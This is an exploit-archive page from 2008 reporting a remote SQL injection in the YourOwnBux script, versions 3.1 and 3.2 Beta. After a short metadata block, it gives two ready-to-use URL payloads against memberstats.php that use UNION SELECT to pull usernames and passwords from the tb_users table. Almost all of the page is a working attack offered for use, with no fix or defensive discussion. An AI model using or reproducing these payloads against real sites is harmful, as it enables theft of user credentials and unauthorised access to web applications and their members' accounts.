YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability
# Published : 2008-08-27
# Author : ~!Dok_tOR!~
# Previous Title : phpMyRealty <= 1.0.9 Multiple Remote SQL Injection Vulnerabilities
# Next Title : z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

3.2 Beta version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit:

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*

# www.Syue.com [2008-08-27]